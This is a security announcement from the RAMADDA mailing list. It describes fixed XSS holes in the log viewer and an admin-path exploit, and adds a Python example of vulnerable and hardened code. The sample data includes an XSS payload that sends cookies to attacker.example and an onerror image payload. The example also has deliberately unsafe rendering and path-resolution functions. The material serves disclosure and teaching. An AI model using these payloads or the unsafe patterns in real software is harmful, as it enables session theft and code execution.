changes to admin and user settings


Jeff McWhirter

Aug 28, 2023, 12:35:53 PM8/28/23
to ramadda
Hi RAMADDA users,
Last week someone notified me of a couple of Cross Site Scripting (XSS) vulnerabilities. The major one was adding an XSS exploit to the user-agent on a request. This would then show up in the RAMADDA logs and, if viewed via the web interface, would evaluate the XSS exploit. The other one involved a malformed URL that contained the XSS exploit. This person also did a very deep dive into the RAMADDA source and identified some other server exploits that could be taken advantage of if an admin account got compromised.

I have fixed the XSS vulnerabilities as well as the underlying potential server exploits (see below for more details).

As an added layer of security I have also made a change to the user settings, admin settings and admin->new user forms. These now, by default, require a password. With the latest release you should see something like the below for the user password/admin/etc. forms-

[attachment: image.png]

This behavior can be turned off if desired (but not recommended) with a property setting-

I have made a new release of RAMADDA at -

-Jeff


As to the server exploit - basically, RAMADDA provides a service integration framework that can call out to external programs on the server to do something (e.g., running gs to extract a thumbnail image from a PDF file). These program paths are set by RAMADDA properties which can be set both through .properties files on the server as well as through properties in the Admin->Settings web interface. So, if a bad actor could take over an admin account they could set a property (e.g., the gs path) to a shell script that they uploaded through RAMADDA as a regular file entry. This is fixed now by only using the paths defined in the external server-based properties files. The password requirement described above would also block a bad actor from changing Admin settings.
[attachment: image.png]

If you had configured your RAMADDA to make use of external programs via the Admin->Extra Properties form you should move those property settings to a .properties file in your server's RAMADDA home directory.
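The two issue classes described in this message (the stored XSS through the user-agent and URL fields of the request log, and the admin-editable program path for external tools such as gs) are illustrated below in an added example. This is not RAMADDA's code and does not use its API; the property name ramadda.gs.path, the paths under /opt/ramadda and /usr/bin, the minimal .properties reader and the sample log entries are all constructed for the example. Each part shows the vulnerable behaviour beside the hardened one that the post's fixes correspond to: HTML-escaping every request-derived field before it is rendered in the log viewer, and resolving external program paths only from server-side .properties files while ignoring whatever was saved through the web settings form.

```python
"""Added example, not RAMADDA code: two vulnerability classes from the post.

Part 1: rendering a request log in HTML (User-Agent / URL stored XSS).
Part 2: choosing which property source may define an external program path.
"""
import html

# --- Part 1: request log viewer -------------------------------------------

# Constructed sample entries as (client ip, request path, user-agent).
# The second carries the payload in the URL, the third in the User-Agent.
SAMPLE_LOG = [
    ("192.0.2.10", "/repository/entry/show?entryid=abc", "Mozilla/5.0"),
    ("192.0.2.11", "/repository/search?text=<img src=x onerror=alert(1)>", "curl/8.0"),
    ("192.0.2.12", "/repository",
     "<script>document.location='http://attacker.example/?c='+document.cookie</script>"),
]


def render_log_unsafe(entries):
    """Vulnerable: attacker-controlled fields go straight into the HTML table,
    so an admin viewing the log executes the script in their own session."""
    rows = ["<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (ip, path, ua)
            for ip, path, ua in entries]
    return "<table>" + "".join(rows) + "</table>"


def render_log_safe(entries):
    """Hardened: every field that originated from the request is HTML-escaped
    (html.escape also escapes quotes, so attribute contexts are covered)."""
    rows = ["<tr><td>%s</td><td>%s</td><td>%s</td></tr>"
            % (html.escape(ip), html.escape(path), html.escape(ua))
            for ip, path, ua in entries]
    return "<table>" + "".join(rows) + "</table>"


# --- Part 2: external program path resolution -----------------------------

def parse_properties(text):
    """Minimal Java-style .properties reader: key=value lines, '#' or '!'
    comment lines, no escape handling (enough for this example)."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


# Constructed: a .properties file in the server's RAMADDA home directory.
# Only someone with shell access to the host can change this.
SERVER_PROPERTIES = parse_properties("""
# set by the server operator on disk
ramadda.gs.path=/usr/bin/gs
""")

# Constructed: what a compromised admin account saved via Admin->Settings.
# The "program" is a shell script the attacker uploaded as a normal file entry.
ADMIN_WEB_SETTINGS = {
    "ramadda.gs.path": "/opt/ramadda/storage/entries/2023/08/payload.sh",
}


def resolve_program_unsafe(name, web_settings, file_props):
    """Before the fix: web-editable settings take precedence over the file,
    so an admin session is enough to point 'gs' at an uploaded script."""
    key = "ramadda.%s.path" % name
    return web_settings.get(key, file_props.get(key))


def resolve_program_safe(name, web_settings, file_props):
    """After the fix: program paths come only from server-side .properties
    files; the web settings are not consulted for this key at all."""
    key = "ramadda.%s.path" % name
    return file_props.get(key)


if __name__ == "__main__":
    print(render_log_unsafe(SAMPLE_LOG))
    print(render_log_safe(SAMPLE_LOG))
    print("unsafe gs:", resolve_program_unsafe("gs", ADMIN_WEB_SETTINGS, SERVER_PROPERTIES))
    print("safe gs:  ", resolve_program_safe("gs", ADMIN_WEB_SETTINGS, SERVER_PROPERTIES))
```

Running the block prints the two rendered tables and the two resolved gs paths; in the unsafe case the User-Agent script tag survives into the HTML and the uploaded payload.sh is what would be executed, in the safe case the tag is rendered as text and only /usr/bin/gs from the on-disk file is used. The second part is why the post asks operators to move any external-program properties out of Admin->Extra Properties and into a .properties file: after the change, values saved through the web form are no longer read for those keys.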



